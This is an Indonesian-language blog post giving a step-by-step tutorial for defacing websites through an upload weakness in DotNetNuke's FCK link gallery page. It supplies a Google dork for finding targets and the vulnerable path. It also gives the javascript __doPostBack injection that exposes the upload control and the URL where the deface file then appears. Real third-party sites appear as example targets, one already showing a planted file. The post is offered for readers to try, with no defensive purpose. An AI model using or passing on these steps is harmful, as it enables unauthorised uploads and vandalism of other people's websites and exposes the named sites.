Deface via DNN(DotNetNuke) exploit

permisi...... mau sharing sedikit tentang ilmu yang hampir saya kuasai, maklum masih nyubii, . .
pabila kurang berkenan, langsung tinggalkan aja blog ini. tapi mungkin sedikit bermanfaat bagi yang super nyubi kayak saya ini. hehehehe, . . . ^_^
langsung saja

1. Sapkan file deface anda
contoh bisa di lihat di sini >> http://www.embnet.be/portals/0/kifli.txt

lalu save di notepad dengan nama file terserah anda contoh kifli.txt

2.mencari target web

dork >> inurl:”/portals/0″
search di google...!!

3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://www.embnet.be/portals/0/ << Target

kita potong setengah link diatas ,, hahaha kaya demo masak aja pake acara Potong link...

contoh >>  http://www.embnet.be/ << harus seperti ini..!!
baru tambahkan >> /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
nanti seperti ini >> http://www.embnet.be/Providers...nkgallery.aspx
Enter..!!
lalu klik/ceklist Link Type: >> File ( A File On Your Site )

setelah di klik atto ceklis,hapus link di URL...!!
http://colonysquare-la.com/Providers...nkgallery.aspx
/\
||
||
hapus semua..!!
lalu masukan ini di URL >> javascript:__doPostBack('ctlURL$cmdUpload','')
>>>ENTER..!!

lalu silahkan Upload dari kompi/PC anda file yg td di save contoh kifli.txt
klik >> Upload Selected File
selesai upload nanti seperti ini kelihatan di File Name: kifli.txt
untuk melihat hasilnya >> nama web/Portals/0/nama file

contoh >> http://www.embnet.be/portals/0/kifli.txt

selamat mencoba 

2 komentar: